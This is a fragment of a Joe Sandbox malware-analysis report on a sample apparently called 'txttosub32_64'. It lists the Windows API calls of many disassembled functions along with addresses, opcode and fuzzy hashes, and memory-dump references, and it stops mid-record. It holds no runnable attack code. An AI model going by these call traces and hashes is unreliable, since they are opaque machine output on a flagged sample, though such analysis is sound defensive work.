                                                                                  • Opcode Fuzzy Hash: 8320bcfb206bf8dc06a1fd5f20176be62fc59fafab044471b46a57c9d16d7f4f
                                                                                  • Instruction Fuzzy Hash: 50F0B432D583125EEA6876B47C3AE8A2796EF01734F600A59E855D93C4FF11DC818972
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02DA33B6,00000000), ref: 02DA341E
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02DA3425
                                                                                  • RtlEncodePointer.NTDLL(00000000), ref: 02DA3431
                                                                                  • RtlDecodePointer.NTDLL(00000001), ref: 02DA344E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                  • String ID: RoInitialize$combase.dll
                                                                                  • API String ID: 3489934621-340411864
                                                                                  • Opcode ID: 58fc6fae4b4bc0716af512d3389abb18602a62f662f72118f34c98d8d42b477d
                                                                                  • Instruction ID: 5bf01db459e4514b60378f0a8db9aa75d081cc9da80a0825e5aa6fc642baa36c
                                                                                  • Opcode Fuzzy Hash: 58fc6fae4b4bc0716af512d3389abb18602a62f662f72118f34c98d8d42b477d
                                                                                  • Instruction Fuzzy Hash: 06E0ED71DD0302EBFA625F74EC59B45776ABB80B97F605874B006E1384C7B5CC64AB60
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02DA33F3), ref: 02DA34F3
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02DA34FA
                                                                                  • RtlEncodePointer.NTDLL(00000000), ref: 02DA3505
                                                                                  • RtlDecodePointer.NTDLL(02DA33F3), ref: 02DA3520
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                  • API String ID: 3489934621-2819208100
                                                                                  • Opcode ID: 4cb62ba92fd13cd15d66ab6a54a2e71860583c02f97572b07b2fa85cbca687b6
                                                                                  • Instruction ID: 77db2788f273919e41cb72ce5363bbe5fec5a302089a89bd67a0b2e0d75e8fed
                                                                                  • Opcode Fuzzy Hash: 4cb62ba92fd13cd15d66ab6a54a2e71860583c02f97572b07b2fa85cbca687b6
                                                                                  • Instruction Fuzzy Hash: 9FE01A71DC0302EBFA221F64EC28B1937A9FB80752F300850F102F1380C778CD24AA60
                                                                                  APIs
                                                                                  • TlsGetValue.KERNEL32(0000002A,81815EB4,?,?,?,?,00000000,02DB69F8,000000FF,02DA210A), ref: 02DA1EAA
                                                                                  • TlsSetValue.KERNEL32(0000002A,02DA210A,?,?,00000000), ref: 02DA1F17
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02DA1F41
                                                                                  • HeapFree.KERNEL32(00000000), ref: 02DA1F44
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: HeapValue$FreeProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1812714009-0
                                                                                  • Opcode ID: c4f35db83e31e0c3a064fd1c8f3033b62b1b73f686672bff9064f3731c3f2665
                                                                                  • Instruction ID: 84ac4bc169b9abcdd5b07f71af0c0268034a6feaa6331697e74ad4d4365ebfaf
                                                                                  • Opcode Fuzzy Hash: c4f35db83e31e0c3a064fd1c8f3033b62b1b73f686672bff9064f3731c3f2665
                                                                                  • Instruction Fuzzy Hash: 2B518D36A042859FDB20DF29C868F1ABBE5FB85664F198659F85D973C0D770EC00CB91
                                                                                  APIs
                                                                                  • _ValidateScopeTableHandlers.LIBCMT ref: 02DB56D0
                                                                                  • __FindPESection.LIBCMT ref: 02DB56EA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FindHandlersScopeSectionTableValidate
                                                                                  • String ID:
                                                                                  • API String ID: 876702719-0
                                                                                  • Opcode ID: f15670af85a60891d437539b4fed6479c1b14c5b6750bf47665bb2e87be44ebe
                                                                                  • Instruction ID: 005e165265b13e1f4f408f8f98fa5f6afc9aa1ea5517004fbf397cd41a4bf476
                                                                                  • Opcode Fuzzy Hash: f15670af85a60891d437539b4fed6479c1b14c5b6750bf47665bb2e87be44ebe
                                                                                  • Instruction Fuzzy Hash: 47A18F75A00256CFDF26CF28E990BEDB7A5EF44324FA84669D85697340E731EC01CBA0
                                                                                  APIs
                                                                                  • GetStringTypeW.KERNEL32(00000001,004065F4,00000001,00000000,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B63
                                                                                  • GetStringTypeA.KERNEL32(00000000,00000001,004065F0,00000001,?,?,00000000,00000000,00000001), ref: 00405B7D
                                                                                  • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BB1
                                                                                  • MultiByteToWideChar.KERNEL32(004051A5,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BE9
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405C3F
                                                                                  • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405C51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: StringType$ByteCharMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 3852931651-0
                                                                                  • Opcode ID: 9275cb1da399b1fd50d8cf3ddfc788128e71c75b8896a6814b468d254577af13
                                                                                  • Instruction ID: 0d55a93c6f082afb02b7301b0bbcc5b9772cfb58a36cb7549df46e9807970607
                                                                                  • Opcode Fuzzy Hash: 9275cb1da399b1fd50d8cf3ddfc788128e71c75b8896a6814b468d254577af13
                                                                                  • Instruction Fuzzy Hash: 07417B71500619EFDF209F94DD85AAF7B79EB05750F10443AFA12B6290C3399960CBA9
                                                                                  APIs
                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02D91CB1
                                                                                  • CloseHandle.KERNEL32(?), ref: 02D91CBA
                                                                                  • InterlockedExchangeAdd.KERNEL32(02DC7244,00000000), ref: 02D91CC6
                                                                                  • TerminateThread.KERNEL32(?,00000000), ref: 02D91CD4
                                                                                  • QueueUserAPC.KERNEL32(02D91E7C,?,00000000), ref: 02D91CE1
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D91CEC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                  • String ID:
                                                                                  • API String ID: 1946104331-0
                                                                                  • Opcode ID: 5b1d6a60945ab6e6a375893ca1780ca5720a9635d1b75951a9c5ac269f8e16dd
                                                                                  • Instruction ID: 3edf7e75fe8c074922510140802181d2297a7c483a6cd33817283f9490ad22f6
                                                                                  • Opcode Fuzzy Hash: 5b1d6a60945ab6e6a375893ca1780ca5720a9635d1b75951a9c5ac269f8e16dd
                                                                                  • Instruction Fuzzy Hash: FAF0A432940205FFEB114B96EC0DC57FBBCEB85721B10465EF52A82390DB709D10CB20
                                                                                  APIs
                                                                                  • GetVersionExA.KERNEL32 ref: 004038C7
                                                                                  • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004038FC
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040395C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                  • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                  • API String ID: 1385375860-4131005785
                                                                                  • Opcode ID: 476567a857e94c6b60ab0a2bb3643b3ab9519d2bf8b3118ed803bebf3e2b5968
                                                                                  • Instruction ID: dfbe321087950a958f1f5ebe55e663b38e75b845a74228cdfb1d658b51cb0ff2
                                                                                  • Opcode Fuzzy Hash: 476567a857e94c6b60ab0a2bb3643b3ab9519d2bf8b3118ed803bebf3e2b5968
                                                                                  • Instruction Fuzzy Hash: A53127B29052446DEB319A705C46BDF3F6C9B02305F2400FBD185F52C2D2B99F85CB18
                                                                                  APIs
                                                                                  • std::exception::exception.LIBCMT ref: 02DA18BF
                                                                                    • Part of subcall function 02DA2413: std::exception::_Copy_str.LIBCMT ref: 02DA242C
                                                                                    • Part of subcall function 02DA0C90: __CxxThrowException@8.LIBCMT ref: 02DA0CEE
                                                                                  • std::exception::exception.LIBCMT ref: 02DA191E
                                                                                  Strings
                                                                                  • boost unique_lock has no mutex, xrefs: 02DA18AE
                                                                                  • boost unique_lock owns already the mutex, xrefs: 02DA190D
                                                                                  • $, xrefs: 02DA1923
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                                  • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                                  • API String ID: 2140441600-46888669
                                                                                  • Opcode ID: 93d2798d8a7b912f8433727da5836f0184ed4eb9ba1f0ac8f1bcc5ab948fd187
                                                                                  • Instruction ID: ecb42e13f6c3ef03752f4c2d69349195abd469b922c756bc26f0c15f0e2dbfd4
                                                                                  • Opcode Fuzzy Hash: 93d2798d8a7b912f8433727da5836f0184ed4eb9ba1f0ac8f1bcc5ab948fd187
                                                                                  • Instruction Fuzzy Hash: 0821F4B19083809FD721DF24C564B9BBBE9BF88718F10495DE4A687380D7B5D808CF92
                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D92350
                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D92360
                                                                                  • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D92370
                                                                                  • GetLastError.KERNEL32 ref: 02D9237A
                                                                                    • Part of subcall function 02D91712: __EH_prolog.LIBCMT ref: 02D91717
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                  • String ID: pqcs
                                                                                  • API String ID: 1619523792-2559862021
                                                                                  • Opcode ID: b939fb9ab70f1682ada09d7ed2880a9c81ec620a5ab6caa039f73fa6d98a4613
                                                                                  • Instruction ID: e8bfafeeeb7e3f4fcb6b89956fa255862ace399f29c5072e0abdadb36bac584f
                                                                                  • Opcode Fuzzy Hash: b939fb9ab70f1682ada09d7ed2880a9c81ec620a5ab6caa039f73fa6d98a4613
                                                                                  • Instruction Fuzzy Hash: 0EF01D71940305EBEB11AA74D819BABB7BCEB44701F10456AF846D2340E770DD148BA1
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D94035
                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 02D94042
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02D94049
                                                                                  • std::exception::exception.LIBCMT ref: 02D94063
                                                                                    • Part of subcall function 02D9A5FD: __EH_prolog.LIBCMT ref: 02D9A602
                                                                                    • Part of subcall function 02D9A5FD: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D9A611
                                                                                    • Part of subcall function 02D9A5FD: __CxxThrowException@8.LIBCMT ref: 02D9A630
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                  • String ID: bad allocation
                                                                                  • API String ID: 3112922283-2104205924
                                                                                  • Opcode ID: cdc91f062e5f97798c944eecaea35536f261afca0ff65added386e58de140cfd
                                                                                  • Instruction ID: c34e7b1aa55bd3010e47df9784ffccc4fab45423ed6db49ea2b45ab6bfbb5dfb
                                                                                  • Opcode Fuzzy Hash: cdc91f062e5f97798c944eecaea35536f261afca0ff65added386e58de140cfd
                                                                                  • Instruction Fuzzy Hash: 96F05E72E44209DBDB01EFE0D928BEFB778FF04300F904545E916A2340D7749A148B61
                                                                                  APIs
                                                                                  • GetStartupInfoA.KERNEL32(?), ref: 00403729
                                                                                  • GetFileType.KERNEL32(00000800), ref: 004037CF
                                                                                  • GetStdHandle.KERNEL32(-000000F6), ref: 00403828
                                                                                  • GetFileType.KERNEL32(00000000), ref: 00403836
                                                                                  • SetHandleCount.KERNEL32 ref: 0040386D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileHandleType$CountInfoStartup
                                                                                  • String ID:
                                                                                  • API String ID: 1710529072-0
                                                                                  • Opcode ID: 1ce75c326bde2c2d02afe177aeb4995e441bbd179d01f1070c3041f2ee44749b
                                                                                  • Instruction ID: 340931fb5571d0dd89e9413526c141aa1936fc067e7847d678db743c6b9c99aa
                                                                                  • Opcode Fuzzy Hash: 1ce75c326bde2c2d02afe177aeb4995e441bbd179d01f1070c3041f2ee44749b
                                                                                  • Instruction Fuzzy Hash: A65136B25003508BD7209F28CD48B563FE8EB01336F19C67AE492EB2E1C738C955C75A
                                                                                  APIs
                                                                                    • Part of subcall function 02DA1990: CloseHandle.KERNEL32(00000000,81815EB4), ref: 02DA19E1
                                                                                    • Part of subcall function 02DA1990: WaitForSingleObject.KERNEL32(?,000000FF,81815EB4,?,?,?,?,81815EB4,02DA1963,81815EB4), ref: 02DA19F8
                                                                                  • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02DA1C5E
                                                                                  • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02DA1C7E
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02DA1CB7
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02DA1D0B
                                                                                  • SetEvent.KERNEL32(?), ref: 02DA1D12
                                                                                    • Part of subcall function 02D9418C: CloseHandle.KERNEL32(00000000,?,02DA1C45), ref: 02D941B0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 4166353394-0
                                                                                  • Opcode ID: 0f4a93ce3f097aa93527c23350b8bf2260ed3f6b37cccfe25746e676845fd5dd
                                                                                  • Instruction ID: e8be5efdb19fd8c47a4b16fe2f1196296b8ed5b7fb168c003f81341517b15057
                                                                                  • Opcode Fuzzy Hash: 0f4a93ce3f097aa93527c23350b8bf2260ed3f6b37cccfe25746e676845fd5dd
                                                                                  • Instruction Fuzzy Hash: EA41CD71A003119BEF26DF28CC90B26B7A9EF45724F240668EC19EB395D735DC11CBA5
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D9E030
                                                                                    • Part of subcall function 02D91A01: TlsGetValue.KERNEL32 ref: 02D91A0A
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D9E0AF
                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02D9E0CB
                                                                                  • InterlockedIncrement.KERNEL32(02DC5180), ref: 02D9E0F0
                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02D9E105
                                                                                    • Part of subcall function 02D927F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02D9284E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                                  • String ID:
                                                                                  • API String ID: 1578506061-0
                                                                                  • Opcode ID: 5ce2795bb3ce1739851849ddb38fa7dd20590ada62b41647c5dcb7b3e9205e15
                                                                                  • Instruction ID: d70ae0914f97cfe75a9728d64dca04fbfa49ea3b3a1e618690702d9a1e16441b
                                                                                  • Opcode Fuzzy Hash: 5ce2795bb3ce1739851849ddb38fa7dd20590ada62b41647c5dcb7b3e9205e15
                                                                                  • Instruction Fuzzy Hash: 643136B1905205DFCB10DFA8C544AAABBF9FF48310F14495AE84AE7740E735AA04CFA0
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 02DB02F0
                                                                                    • Part of subcall function 02DA2EEC: __FF_MSGBANNER.LIBCMT ref: 02DA2F03
                                                                                    • Part of subcall function 02DA2EEC: __NMSG_WRITE.LIBCMT ref: 02DA2F0A
                                                                                    • Part of subcall function 02DA2EEC: RtlAllocateHeap.NTDLL(00A70000,00000000,00000001), ref: 02DA2F2F
                                                                                  • _free.LIBCMT ref: 02DB0303
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_free_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1020059152-0
                                                                                  • Opcode ID: 55911ad0bb6a0752ce9708f4ae2ac83bafb67a7aa4a7d339d0f869c8f1e7bacd
                                                                                  • Instruction ID: 23a4cff3df33017785e787afa60d0fc570dd0fc1aea9d3cace574131c858bffa
                                                                                  • Opcode Fuzzy Hash: 55911ad0bb6a0752ce9708f4ae2ac83bafb67a7aa4a7d339d0f869c8f1e7bacd
                                                                                  • Instruction Fuzzy Hash: AA11A732D08616EBDF222F74B83CB9B3799DF05361F104925F98A9A750DB34CD50CAA0
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D921DA
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D921ED
                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02D92224
                                                                                  • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02D92237
                                                                                  • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D92261
                                                                                    • Part of subcall function 02D92341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D92350
                                                                                    • Part of subcall function 02D92341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D92360
                                                                                    • Part of subcall function 02D92341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D92370
                                                                                    • Part of subcall function 02D92341: GetLastError.KERNEL32 ref: 02D9237A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                  • String ID:
                                                                                  • API String ID: 1856819132-0
                                                                                  • Opcode ID: 599e2c8a2f6519cbc3e7b00721b83337f0cea9956612c3ca396729000b9c09e3
                                                                                  • Instruction ID: 0eddbab48a910217089e5c11da1ff56b8816752a778868917ef6f8f600a0cc4a
                                                                                  • Opcode Fuzzy Hash: 599e2c8a2f6519cbc3e7b00721b83337f0cea9956612c3ca396729000b9c09e3
                                                                                  • Instruction Fuzzy Hash: 61117F72D04115EBDF02AFA5D818AAEFBBAFF45310F10861AF856A2360D7718E51DF90
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D9229D
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D922B0
                                                                                  • TlsGetValue.KERNEL32 ref: 02D922E7
                                                                                  • TlsSetValue.KERNEL32(?), ref: 02D92300
                                                                                  • TlsSetValue.KERNEL32(?,?,?), ref: 02D9231C
                                                                                    • Part of subcall function 02D92341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D92350
                                                                                    • Part of subcall function 02D92341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D92360
                                                                                    • Part of subcall function 02D92341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D92370
                                                                                    • Part of subcall function 02D92341: GetLastError.KERNEL32 ref: 02D9237A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                  • String ID:
                                                                                  • API String ID: 1856819132-0
                                                                                  • Opcode ID: 510ec5c2e27ca0cc9c0018a64101d45606cfc91420aae6dbcc406b5a11407823
                                                                                  • Instruction ID: 17b61a42b979842815756d0bb3b680f3835ccd62d920a0496a10668026ef43c2
                                                                                  • Opcode Fuzzy Hash: 510ec5c2e27ca0cc9c0018a64101d45606cfc91420aae6dbcc406b5a11407823
                                                                                  • Instruction Fuzzy Hash: B5115B72D04119EBDF02AFA5D844AAEFBBAEF48310F10452AF805A3320D7714E61DF90
                                                                                  APIs
                                                                                    • Part of subcall function 02D9B098: __EH_prolog.LIBCMT ref: 02D9B09D
                                                                                  • __CxxThrowException@8.LIBCMT ref: 02D9BC62
                                                                                    • Part of subcall function 02DA449A: RaiseException.KERNEL32(?,?,02D9FA92,?,?,?,?,?,?,?,02D9FA92,?,02DC0F78,?), ref: 02DA44EF
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02DC1D94,?,00000001), ref: 02D9BC78
                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D9BC8B
                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02DC1D94,?,00000001), ref: 02D9BC9B
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D9BCA9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                  • String ID:
                                                                                  • API String ID: 2725315915-0
                                                                                  • Opcode ID: 29eaece59bdca74cccc90517b340c4092c1eeea45e7172a9d62fb692c6f2dcca
                                                                                  • Instruction ID: 7668728c82d59eae72128b47529c1ce30edbb321c63af4873a68ef3895716a24
                                                                                  • Opcode Fuzzy Hash: 29eaece59bdca74cccc90517b340c4092c1eeea45e7172a9d62fb692c6f2dcca
                                                                                  • Instruction Fuzzy Hash: 92016DB2A40305EFEB10DAB4EC89F86B7ADEB0475AF104516F625D7390DBA0EC05CB20
                                                                                  APIs
                                                                                  • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D92432
                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D92445
                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02D92454
                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D92469
                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02D92470
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                  • String ID:
                                                                                  • API String ID: 747265849-0
                                                                                  • Opcode ID: aced671e8dd33ac76b157a71d14f788be5c4a78981f2db40ce1687cf0aaf03b4
                                                                                  • Instruction ID: 362a87a994d0cfeabbdfc290868afc1ca171a36626ab4a59481f117f98976e6c
                                                                                  • Opcode Fuzzy Hash: aced671e8dd33ac76b157a71d14f788be5c4a78981f2db40ce1687cf0aaf03b4
                                                                                  • Instruction Fuzzy Hash: 56F01D73640204FBEB119AA4ED99FD6B77CFB85711F904412F601D6680D761AD20CBA1
                                                                                  APIs
                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 02D91ED2
                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02D91EEA
                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02D91EF9
                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D91F0E
                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02D91F15
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                  • String ID:
                                                                                  • API String ID: 830998967-0
                                                                                  • Opcode ID: e62a5021526ba1916b3480964464e70e31cf7b2cec07ff76f09bd149064243c0
                                                                                  • Instruction ID: 872f6b4fa1ea325d9eb61668f93b0e313aea9ea0b893cf06d769d9614a89bc36
